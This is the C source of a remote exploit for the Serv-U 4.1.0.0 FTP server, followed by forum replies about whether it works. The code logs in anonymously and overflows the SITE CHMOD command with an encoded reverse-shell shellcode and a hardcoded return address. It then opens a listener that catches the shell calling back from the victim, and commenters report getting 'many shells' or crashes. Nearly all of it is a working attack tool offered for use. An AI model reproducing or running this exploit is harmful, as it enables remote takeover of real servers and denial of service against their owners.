/*
date: 25 janv 2004
software: Serv-U 4.1.0.0 (prolly others)
vendor: RhinoSoft, http://www.serv-u.com/
credits: kkqq <kkqq@0x557.org>, http://www.0x557.org/release/servu.txt
greets: rosecurity team, int3liban
notes: should work on any NT, reverse bindshell, terminates the process
properly handle directories
author: mandragore, sploiting@mandragore.solidshells.com

cheap changelog:
27 jan 2004 improved banners handling (select()'s),
added listener,
default ip gathering (needs ifconfig & gawk)

*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <fcntl.h>
#include <unistd.h>
#include <signal.h>

#define fatal(x) { perror(x); exit(1); }

unsigned char sc[]={
// reverse bindshell, 204 bytes, uses import table
0x33,0xC0,0x04,0xB6,0x68,0xE2,0xFA,0xC3,0xCC,0x68,0x80,0x36,0x96,0x46,0x50,0x68,

0x8B,0x34,0x24,0xB9,0xFF,0xD4,0xF2,0xF1,0x19,0x90,0x96,0x96,0x28,0x6E,0xE5,0xC9,

0x96,0xFE,0xA5,0xA4,0x96,0x96,0xFE,0xE1,0xE5,0xA4,0xC9,0xC2,0x69,0x83,0xE2,0xE2,

0xC9,0x96,0x01,0x0F,0xC4,0xC4,0xC4,0xC4,0xD4,0xC4,0xD4,0xC4,0x7E,0x9D,0x96,0x96,

0x96,0xC1,0xC5,0xD7,0xC5,0xF9,0xF5,0xFD,0xF3,0xE2,0xD7,0x96,0xC1,0x69,0x80,0x69,

0x46,0x05,0xFE,0xE9,0x96,0x96,0x97,0xFE,0x94,0x96,0x96,0xC6,0x1D,0x52,0xFC,0x86,

0xC6,0xC5,0x7E,0x9E,0x96,0x96,0x96,0xF5,0xF9,0xF8,0xF8,0xF3,0xF5,0xE2,0x96,0xC1,

0x69,0x80,0x69,0x46,0xFC,0x86,0xCF,0x1D,0x6A,0xC1,0x95,0x6F,0xC1,0x65,0x3D,0x1D,

0xAA,0xB2,0xC6,0xC6,0xC6,0xFC,0x97,0xC6,0xC6,0x7E,0x92,0x96,0x96,0x96,0xF5,0xFB,

0xF2,0x96,0xC6,0x7E,0x99,0x96,0x96,0x96,0xD5,0xE4,0xF3,0xF7,0xE2,0xF3,0xC6,0xE4,

0xF9,0xF5,0xF3,0xE5,0xE5,0xD7,0x96,0x50,0x91,0xD2,0x51,0xD1,0xBA,0x97,0x97,0x96,

0x96,0x15,0x51,0xAE,0x05,0x3D,0x3D,0x3D,0xF2,0xF1,0x37,0xA6,0x96,0x1D,0xD6,0x9A,

0x1D,0xD6,0x8A,0x1D,0x96,0x69,0xE6,0x9E,0x69,0x80,0x69,0x46
};

char *user="anonymous";
char *pass="not@for.you";
char *path="/incoming";

int s, ret;
char *buff;
int verbose=0;
struct sockaddr_in saddr;
int lhost, lport=8888;

void usage(char *argv0) {
printf("usage: %s -d <ip_dest> [options]\n",argv0);
printf("options:\n");
printf(" -d target ip\n");
printf(" -p target port (default 21)\n");
printf(" -u username to log with (default %s)\n",user);
printf(" -s password to log with (default %s)\n",pass);
printf(" -w writable directory (default %s)\n",path);
printf(" -H listening host (default %s)\n", \
inet_ntoa(*(struct in_addr *)&lhost));
printf(" -P listening port on host (default %d)\n",lport);
printf(" -v verbose (set to 1 to enable)\n");
printf("\n");
exit(1);
}

void reads() {
fd_set fds;
struct timeval tv;

__next:
ret=recv(s,buff,4095,0);
memset(buff+ret,0,1);
if (verbose) printf("%s",buff);

FD_ZERO(&fds);
FD_SET(s,&fds);
tv.tv_sec = 1; tv.tv_usec = 0;
if (select(s+1, &fds, NULL, NULL, &tv)!=0)
goto __next;
}

int getip() {
char buff[17]="";
FILE *f;

f=popen("echo -n `/sbin/ifconfig|grep Bcast|" \
"gawk '{\\$0=gensub(/:/,\" \",1);print $3;exit;}'`","r");
fgets(buff,16,f);
pclose(f);

return inet_addr(buff);
}

void callback(int port) {
fd_set fds;
int s_len=sizeof(saddr);
int sn;

buff=(char *)malloc(4096);

saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = 0;
saddr.sin_port = htons(port);
printf("[.] setting up listener on port %d..\n",port);
s=socket(2,1,6);
ret=bind(s,(struct sockaddr *)&saddr, sizeof(saddr));
if (ret==-1) {
// we don't want to crash servu if not needed
perror("[-] shell.bind");
kill(getppid(),SIGUSR1);
exit(1);
}
listen(s,1);
sn=accept(s,(struct sockaddr *)&saddr,&s_len);
printf("[+] got connection from %s, entering shell..\n", \
inet_ntoa(*(struct in_addr *)&saddr.sin_addr.s_addr));

while(1) {
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sn,&fds);

if (select(sn+1, &fds, NULL, NULL, NULL) < 0)
fatal("[-] shell.select ");

if (FD_ISSET(0,&fds)) {
ret = read(1,buff,4096);
send(sn,buff,ret,0);
}

if (FD_ISSET(sn,&fds)) {
if ( (ret=recv(sn,buff,4096,0)) < 1 )
fatal("[-] shell.recv");
write(1,buff,ret);
}

}

}

void killchild() {
printf("[-] got signal from parent, exiting.\n");
exit(1);
}

void killmain() {
printf("[-] got signal from child, exiting.\n");
exit(1);
}

int main(int argc, char **argv) {
short port=21;
int target=0;
int i, pid;

int delta=423;
int callebx=0x10077A92; // libeay32.dll
char jmpback[]="\xe9\xff\xfe\xff\xff\xeb\xf9\x90\x90"; // jmp -256
char chmod[]="SITE CHMOD 777 ";

printf("[%%] Serv-u v4.1.0.0 sploit by mandragore (v2)\n");

lhost=getip();

if (argc<2)
usage(argv[0]);

while((i = getopt(argc, argv, "d:p:u:s:w:H:P:v:"))!= EOF) {
switch (i) {
case 'd':
target=inet_addr(optarg);
break;
case 'p':
port=atoi(optarg);
break;
case 'u':
user=optarg;
break;
case 's':
pass=optarg;
break;
case 'w':
path=optarg;
break;
case 'H':
lhost=inet_addr(optarg);
break;
case 'P':
lport=atoi(optarg);
break;
case 'v':
verbose=atoi(optarg);
break;
default:
usage(argv[0]);
break;
}
}

if ((target==-1) || (lhost==-1) || (lhost==0))
usage(argv[0]);

printf("[.] if working you'll have a shell on %s:%d.\n", \
inet_ntoa(*(struct in_addr *)&lhost),lport);
printf("[.] launching attack on ftp://%s:%s@%s:%d%s\n", \
user,pass,inet_ntoa(*(struct in_addr *)&target),port,path);

pid=fork();
switch(pid) {
case 0:
signal(SIGUSR1,killchild);
callback(lport);
break;
default:
signal(SIGUSR1,killmain);
break;
}

lport=lport ^ 0x9696;
lport=(lport & 0xff) << 8 | lport >>8;
memcpy(sc+0x5a,&lport,2);

lhost=lhost ^ 0x96969696;
memcpy(sc+0x53,&lhost,4);

buff=(char *)malloc(4096);

saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = target;
saddr.sin_port = htons(port);

s=socket(2,1,6);

ret=connect(s,(struct sockaddr *)&saddr, sizeof(saddr));
if (ret==-1) {
kill(pid,SIGUSR1); sleep(1);
fatal("[-] connect()");
}
reads();

sprintf(buff,"USER %s\r\n",user);
if (verbose) printf("%s",buff);
send(s,buff,strlen(buff),0);

reads();

sprintf(buff,"PASS %s\r\n",pass);
if (verbose) printf("%s",buff);
send(s,buff,strlen(buff),0);

reads();

if (strstr(buff,"230")==0) {
printf("[-] can't login\n");
exit(1);
} else
printf("[+] logged in.\n");

sprintf(buff,"CWD %s\r\n",path);
if (verbose) printf("%s",buff);
send(s,buff,strlen(buff),0);

reads();

// verify directory
sprintf(buff,"PWD\r\n",path);
send(s,buff,strlen(buff),0);
ret=recv(s,buff,1024,0);
memset(buff+ret,0,1);
i=strstr(buff+5,"\x22")-buff-5;
if (i!=1) i++; // trailing /

printf("[+] sending exploit..\n");

bzero(buff,4096);
memset(buff,0x90,600);
strcat(buff,"\r\n");
delta-=i; // strlen(path);
memcpy(buff,&chmod,strlen(chmod));
memcpy(buff+delta-9-strlen(sc),&sc,strlen(sc));
memcpy(buff+delta-9,&jmpback,5+4);
memcpy(buff+delta,&callebx,4);

send(s,buff,602,0);

ret=recv(s,buff,1024,0);
if ((ret==0) || (ret==-1)) {
kill(pid,SIGUSR1); sleep(1);
sleep(1);
fatal("[+] done");
}

printf("[-] remote servu isn't vulnerable.\n");
memset(buff+ret,0,1);
printf("%s",buff);

close(s);

exit(0);
}


it works ! get many shells with it

Just crashes serv-u for me

Same results on this end. Just crashed. Thanxs for the post.

doesn't work for me too ... it crashes servu but theres no shell ....

but I'm, wondering about this:
the exploit sets up a listener ... but it doesn't wait for an connection ... after serv-u is crashed it says this to me and exits ... so the reverse shell can't even connect ! o.O

doesnt work for me, too. only an error message pops up. for those which understand german this is the error messag i get:

` Der Prozedureinsprungspunkt `getopt` wurde in der DLL `cygwin1.dll` nicht gefunden.`


maybe someone could help me?

greetz

Big thx for this tool dude, nice tool ^^